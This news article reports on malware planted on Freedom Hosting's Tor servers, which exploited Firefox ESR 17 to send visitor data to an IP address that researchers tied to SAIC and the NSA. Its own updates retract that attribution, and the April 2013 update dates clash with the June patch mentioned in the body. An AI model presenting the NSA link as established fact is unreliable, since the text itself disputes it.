Update April 7, 2013: The researchers at Baneki and Cryptocloud have heavily revised their findings, backing off claims of an explicit connection between the IP addresses associated with malware that attacked Tor browser users and the National Security Agency. They still maintain that there is a high likelihood of a connection, but admit their read of the data that led to the conclusions does not match up with the analysis of others who looked at the data sources later.
Malware planted on the servers of Freedom Hosting—the "hidden service" hosting provider on the Tor anonymized network brought down late last week—may have de-anonymized visitors to the sites running on that service. This issue could send identifying information about site visitors to an Internet Protocol address that was hard-coded into the script the malware injected into browsers. And it appears the IP address in question belongs to the National Security Agency (NSA).
This revelation comes from analysis done collaboratively by Baneki Privacy Labs, a collective of Internet security researchers, and VPN provider Cryptocloud. When the IP address was uncovered in the JavaScript exploit—which specifically targets Firefox Long-Term Support version 17, the version included in Tor Browser Bundle—a source at Baneki told Ars that he and others reached out to the malware and security community to help identify the source.
The exploit attacked a vulnerability in the Windows version of the Firefox Extended Support Release 17 browser—the one used previously in the Tor Project's Tor Browser Bundle (TBB). That vulnerability had been patched by Mozilla in June, and the updated browser is now part of TBB. But the TBB configuration of Firefox doesn't include automatic security updates, so users of the bundle would not have been protected if they had not recently upgraded.
Initial investigations traced the address to defense contractor SAIC, which provides a wide range of information technology and C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance) support to the Department of Defense. The geolocation of the IP address corresponds to an SAIC facility in Arlington, Virginia.
Further analysis using a DNS record tool from Robtex found that the address was actually part of several blocks of IP addresses allocated by SAIC to the NSA. This immediately spooked the researchers.
"One researcher contacted us and said, 'Here's the Robotex info. Forget that you heard it from me,'" said a member of Baneki who requested he not be identified.
The use of a hard-coded IP address traceable back to the NSA is either a strange and epic screw-up on the part of someone associated with the agency (possibly a contractor at SAIC) or an intentional calling card as some analyzing the attack have suggested. One poster on Cryptocloud's discussion board wrote, "It's psyops—a fear campaign... They want to scare folks off Tor, scare folks off all privacy services."
Update, April 5: There are several sources that contend that the analysis of the DNS records by Baneki and Cryptocloud is flawed because of aged domain data for the IP address, and that the address block could be in use by any number of federal agencies or government contractors connected through Verizon Business / UUNET in that area. But DNS data points to the address being owned by SAIC.
Update #2 April 5: A Baneki spokesperson said in response to questions raised about the DNS data, "The malware specialists we know have shared their interpretations with us, which is what we've disclosed, along with the tools used to come to those conclusions; we're entirely open to firsthand experts correcting if, indeed, a correction would be required; again, at that level it seems a question of fact rather than interpretation. We're not the final arbiter of that fact. There's enough top-level DNS/IP subject matter experts that we expect a form of peer review kicks in now." He added, "We've seen many cases of geo info in ARIN inaccurate, but NEVER a case where IP ownership info is 'outdated,' ever. Again, however, we defer to credentialed subject matter experts as the final arbiters on what the IP data signify We'll be surprised if in the end, it's somehow an 'error' and NSA/SAIC has no connection whatsoever; however, facts are stubborn things & we go with the facts."
Listing image by NSA
reader comments
129